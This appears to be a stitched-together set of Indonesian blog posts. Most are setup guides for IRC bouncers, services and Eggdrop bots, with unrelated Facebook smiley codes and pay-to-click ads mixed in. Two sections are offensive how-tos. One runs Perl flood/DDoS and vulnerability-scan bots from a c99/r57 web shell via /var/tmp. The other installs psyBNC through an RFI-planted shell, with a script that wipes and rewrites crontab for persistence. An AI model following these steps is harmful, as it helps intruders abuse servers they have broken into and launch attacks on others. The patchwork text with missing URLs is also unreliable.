Tetap mengetahui apapun yang terjadi dan saat itu terjadi sementara anda sedang tidak terhubung, timestamps akan selalu dicetak dan dapat dikonfigurasi secara manual.

Dukungan SSL
Enkripsi untuk port pendengar dan port koneksi ke server IRC. Jika sistem anda terdapat OpenSSL, ZNC akan secara otomatis mendukung koneksi SSL.

Bouncing DCC
Bouncing transparan untuk anonimitas DCC.

Menggunakan modul global partyline, anda dapat terhubung ke channel dan privat dengan user lain yang berada didalam jaringan internal ZNC.

Administrasi Web
Menggunakan modul global webadmin, admin dapat menambah/menghapus/merubah setting user dan setting global dan selain admin dapat merubah setting mereka masing-masing.
Sumber Wiki Znc
Jika masih penasaran silahkan google :D
Langkah nya sebagai berikut :
Pertama2 unduh/download file yg di bawah
[root@ANASKI][:~]# wget
Setelah selesai lakukan perintah ekstrak file dengan perintah :
[root@ANASKI][:~]# tar zxvf znc-0.072.tar.gz
kemudian masuk ke directory dg perintah :
[root@ANASKI][:~]# cd znc-0.072
Berikutnya lakukan Perintah untuk kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./configure --disable-c-areas
[root@ANASKI][:~]# make
[root@ANASKI][:~]# make install
Kemudian membuat config, lakukan dg perintah :
[root@ANASKI][:~]# ./znc --makeconf
Sekarang cobalah untuk menjalankan sBNC dengan perintah:
[root@ANASKI][:~]# ./znc
Semoga bermanfaat dengan tutorialnya :D
Bot perl adalah sejenis sejenis bot yang bisa konek dengan menggunakan perl. sedangkan perl adalah sejenis pemprograman bahasa. untuk info perl silahkan google :D

Sebenarnya cara membuat bot perl itu gampang cara nya sebagai berikut :

  1. pertama anda masuk ke shell / c99 / r57 anda yang ada menggunakan bahasa pemprograman perl
  2. cukup Lakukan perintah di bawah ini :
cd /var/tmp;wget
cd /var/tmp;chmod 755 scan.txt
cd /var/tmp;perl scan.txt
Script bot perl ada 2 macam :
  1. di kenal dengan nama bot perl yaitu bot yang digunakan untuk memenuhkan channel dan digunakan untuk flood, ddos, tsunami dll
  2. bot scan yang di gunakan untuk mencari celah web untuk di jadikan target/shell
ini script bot scan
Buat facebook-er yang hobi chat (chating) di facebook. Tentu akan lebih seru kalau saat chat menggunakan kode smiley dan chat emoticons.

Adapun cara untuk membuat kode smiley di facebook, sebagai berikut :

- Aktifkan NumLock pada keyboard... anda terlebih dahulu.

- Tekan tombol Alt di ikuti angka berikut ini :

1 - ☺
2 - ☻
3 - ♥
4 - ♦
5 - ♣
6 - ♠
7 - •
8 - ◘
9 - ○
10 - ◙
11 - ♂
12 - ♀
13 - ♪
14 - ♫
15 - ☼
16 - ►
17 - ◄
18 - ↕
19 - ‼
20 - ¶
21 - §
22 - ▬
23 - ↨
24 - ↑
25 - ↓
26 - →
27 - ←
28 -∟
29 - ↔
30 -▲
31 -▼
32 -
33 - !
34 - "
35 - #
36 - $
37 - %
38 - &
39 - '
40 - (
41 - )
42 -*
43 - +
44 - ,
45 - -
46 - .
47 - /
48 - 0
49 - 1
50 - ┬

Dan lain lain
- Contoh : Jika kita menekan tombol Alt+14, nanti akan keluar simbol ♫ . (Pastikan NumLock selalu aktif)

Selamat Berchat Facebook :D
PTC adalah singkatan dari Pay To Click, yang secara sederhana berarti kita akan dibayar dari setiap kali meng-klik sebuah iklan selama jangka waktu yang terbatas

Earn up to $0.02 (2 cents) per click.
Earn up to $0.01 (1 cent) for every ad your referrals click.
Instant Payment / Receiving System.

Earn up to $0.02 (2 cents) per click.
Earn up to $0.01 (1 cent) for every ad your referrals click.
Instant Payment / Receiving System.
shroudBNC atau sering jg di sebut sBNC adalah klien BNC seperti psyBNC, yang membuat anda tetap tersambung ke jaringan walaupun anda tidak tersambung ke IRC client, Cara kerjanya sama dengan beberapa skrip seperti TCL dan pengaturannya pun sangat mudah.

Langkah nya sebagai berikut :
Pertama2 unduh/download file yg di bawah
[root@ANASKI][:~]# wget

Setelah selesai lakukan perintah ekstrak file dengan perintah :
[root@ANASKI][:~]# tar -zvxf sbnc-1.1.tar.gz

kemudian masuk ke directory dg perintah :
[root@ANASKI][:~]# cd sbnc-1.1

Berikutnya lakukan Perintah untuk kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./configure
[root@ANASKI][:~]# gmake
[root@ANASKI][:~]# make install

Kemudian, lakukan perintah :
[root@ANASKI][:~]# ./conftool

shroudBNC1.1 $Revision: 371 $ - an object-oriented IRC bouncer
*** configuration generator

This utility will automatically generate a suitable configuration
for you once it has asked you some questions.
1. Which port should the bouncer listen on? [9000] 60613 --> isikan port
2. What should the first user's name be? ANASKI --> isikan identd
3. Please enter a password for the first user: ANASKI --> isikan password
Writing config...

Sekarang cobalah untuk menjalankan sBNC dengan perintah:
[root@ANASKI][:~]# ./sbnc

shroudBNC loader
Loading shroudBNC from ./
Tue Dec 21 07:06:13 2010 Log system initialized.
shroudBNC1.1 $Revision: 371 $ - an object-oriented IRC bouncer
Tue Dec 21 07:06:13 2010 Could not create listener port

Semoga bermanfaat

psyBNC adalah suatu program IRC (Internet Relay Chat). psy adalah kependekan dari psychoid, suku pencipta aslinya. Sedangkan BNC adalah kependekan dari "bounce" (Melambung). Jadi psyBNC adalah suatu program yang digunakan untuk proses "pelambungan" melalui sebuah server untuk menyamarkan ip "nama host" (vhost).

Disni Saya akan membahas cara install Anope Services unreal Ircd
sebenarnya cara install sama dg install unreal ircd tapi ada perintah2 yg belum ada pada tutor install unreal ircd
pertama silahkan login ssh [shell] dulu
Setelah itu Lakukan perintah :
[root@ANASKI][:~]# wget

[root@ANASKI][:~]# tar -zxvf anope-1.8.5.tar.gz

[root@ANASKI][:~]# cd anope-1.8.5

[root@ANASKI/anope-1.8.5][:~]# make

proses instalasi akan berjalan, untuk menyempurnakan proses compile Anope, lanjutkan dengan menjalankan perintah :

[root@ANASKI/anope-1.8.5][:~]# make install

- seeep, skrg tinggal mengedit file services.conf nya, lakukan perintah :

[root@ANASKI/anope-1.8.5][:~]# pico services.conf

-baiklah, saya anggap sudah selesai di edit, skrg tinggal menggunakan jurus run :
[root@ANASKI/anope-1.8.5][:~]# ./services

Kalau ada yang mau di tanyakan silahkan contact saya atau coment :D
Pertama2 silahkan download file dengan perintah :
[root@ANASKI][:~]# wget

kemudian lakukan meng exstrak dg perintah :
[root@ANASKI][:~]# tar -zxvf Unreal3.2.8.1.tar.gz

kemudian masuk ke dalam directory :
[root@ANASKI][:~]# cd Unreal3.2.8.1

lakukan proses kompilasi paket dengan perintah :
[root@ANASKI][:~]# ./Config

Installing 17% <-- tekan enter seterusnya sampai 100% -maka ketik :
[root@ANASKI][:~]# make

proses instalasi akan berjalan, untuk menyempurnakan proses compile ircd, lanjutkan dengan menjalankan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# make install

- ok, skrg ircd udh selesai, tinggal di run,edit terlebih dahulu file unrealircd.conf - lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico unrealircd.conf

- setelah selesai, skrg tinggal mengedit file oper.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico oper.conf

- terakhir, skrg tinggal mengedit file connect.conf nya, lakukan perintah :
[root@ANASKI/Unreal3.2.8.1][:~]# pico connect.conf

nah, lakukan proses edit, bagian admin serta server yg mau di gunakan, akan lebih mudah mengedit menggunakan program winscp. -baiklah, saya anggap sudah selesai di edit, skrg tinggal menggunakan jurus run :
[root@ANASKI/Unreal3.2.8.1][:~]# ./unreal start

Install Anope IRCD Services
Eggdrop merupakan supported IRC Bot yang terbaik (menurutku), paling populer, dan paling advanced, sedangkan IRC Bot sendiri kebanyakan adalah berfungsi untuk membantu management channel IRC.Banyak macamnya sesuai fungsinya seperti Bot proteksi, Bot Game, Bot Zodiak, Bot News, Bot Cuaca, Bot Log Channel, dan sebagainya (beberapa company irc hosting di Indonesia menyediakan untuk disewa bagi yang ga mau ribet membuatnya).
Tapi bagi yang menginginkan Bot Proteksi sebetulnya disarankan buat meng-create sendiri karena bagaimana settingnya bisa disesuaikan dengan kebutuhan channel masing-masing yang jelas berbeda. Bagi pemula, sebelum membuat eggdrop atau IRC Bot perlu tau dong apa aja yang dibutuhkan. Seperti membuat kue, membuat kerajinan, dan lainnya eggdrop atau IRC Bot juga butuh sesuatu sebagai dasar adonannya
Yang dibutuhkan adalah SHELL, sebaiknya gunakan SHELL legal bisa dibeli di beberapa company irc hosting Indonesia yang melayani (cari di google aja yah :) )? setelah itu siapkan config, trus persiapkan TCL apa yang diinginkan. Misalnya ingin membuat Bot Game ya siapkan TCL Game, dan seterusnya. Nah setelah punya SHELL (yang legal, nyolong dosa tauuu !!!), siapkan putty (bisa download ke alamat..klik aja tuh kata putty nya). Gunakan Secure SHell protocol atau lebih sering disingkat SSH untuk login ke SHELL.
Selanjutnya download eggdrop1.6.19.tar.gz dari eggheads ftp trus telnet dan FTP ke SHELL. Lamgkah berikutnya adalah:

Upload eggdrop1.6.19.tar.gz via FTP, ketik tar -zxvf eggdrop1.6.19.tar.qz untuk extract filenya.
Kalau udah terextract masuk ke direktorinya dengan mengetik cd eggdrop ketik ./configure

Ketik make config (untuk compile semua modul) atau make iconfig (compile hanya modul yang dipilih)

Ketik make trus ketik lagi make install DEST=/home/name/botdir

Trusss edit config bot sesuai keterangan yg ada dalam filenya.

Cari file dengan nama eggdrop.conf, kemudian edit untuk edit bisa gunakan perintah for example, pico/nano/vi eggdrop.conf (pilih salah satu).

Kalo udah mengedit simpan file eggdrop tadi kemudian jalankan bot dengan perintah:

/eggdrop -m eggdrop.conf (nama config file)

Selanjutnya tinggal masukkan or nambahin TCL deh..

Untuk lengkapnya mengenai tutorial ini bisa dibaca di egghelp (udah lengkap banget bahkan ada TCL juga disitu). Cuma ya� kebanyakan pada males baca kesitu.. in english sih, tipe-tipe orang Indonesia kebanyakan udah males kalo liat tutorialnya in english (he he he).

mungkin anda mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara Anda mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh, untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget
2. tar -zvxf psy.tar.gz

3. cd .psy

4. ./config

contoh: ./config ANASKI 1990
ident = ANASKI
port = 1990

5. ./fuck
perintah ini akan menghapus semua crontab dan membuat crontab baru untuk psyBNC, hati-hatilah menggunakannya

6. ./run
perintah ini akan menjalankan psyBNC, set ident di mIRC sesuai diatas lalu koneklah melalui port yg telah di set pada langkah 4 diatas.

Jika muncul baris dengan pesan “Listening on port 1991?, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:

Contoh: /server ANASKI

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC eloe dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver dan tunggulah sampai psyBNC kita terhubung ke server IRC.